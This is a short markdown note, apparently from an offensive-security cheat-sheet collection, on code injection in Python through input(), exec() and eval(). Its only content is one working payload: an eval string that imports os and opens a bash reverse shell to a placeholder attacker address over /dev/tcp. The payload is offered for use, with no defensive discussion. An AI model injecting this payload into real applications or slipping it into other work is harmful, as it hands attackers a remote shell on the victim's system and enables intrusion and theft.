killchain-compendium/Exploits/Python/Code Injection.md

Code Injection

• Python's input(), exec() and eval() makes it possible

Usage

• Payload example

eval("__import__('os').system('bash -i >& /dev/tcp/$TARGET_IP/$TARGET_PORT 0>&1')#")